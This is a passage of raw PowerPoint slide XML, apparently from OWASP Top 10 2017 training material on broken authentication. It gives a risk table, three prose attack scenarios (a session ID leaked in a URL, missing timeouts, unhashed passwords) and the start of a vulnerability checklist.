                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="16" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="51" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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65" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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79" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="30" idx="3"/>
                <a:endCxn id="32" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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93" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="113" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="32" idx="4"/>
                <a:endCxn id="29" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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7" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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1" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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smtClean="0"/>
              <a:t>A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="626783512"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="956458"/>
          <a:ext cx="6858000" cy="2528422"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="643742">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r>
              <a:tr h="3930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rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>COMMON</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Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERE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rPr>
                        <a:t>Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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475203">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anonymous external attackers, as well as authorized users, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers use leaks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to temporarily or permanently impersonate users.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, create account, change password, forgot password, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Such flaws may allow some or even </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>all</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> accounts to be attacked</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the business value of the affected data and application functions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Also consider the business impact of public exposure of the vulnerability.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A travel reservations application supports URL rewriting, putting session IDs in the URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/sale/saleitems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;jsessionid=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  2P0OC2JSNDLPSKHCJUN2JV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?dest=Hawaii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An authenticated user of the site wants to let their friends know about the sale. User e-mails the above link without knowing they are also giving away their session ID. When the friends use the link they use user’s session and credit card.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and that browser is still authenticated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: An insider or external attacker gains access to the system’s password database. User passwords are not properly hashed and salted, exposing every users’ password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Am I Vulnerable to Hijacking?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are session management assets like user credentials and session IDs properly protected? You may be vulnerable if:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser authentication credentials aren’t properly protected when stored using hashing or encryption. See 2017-A6.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
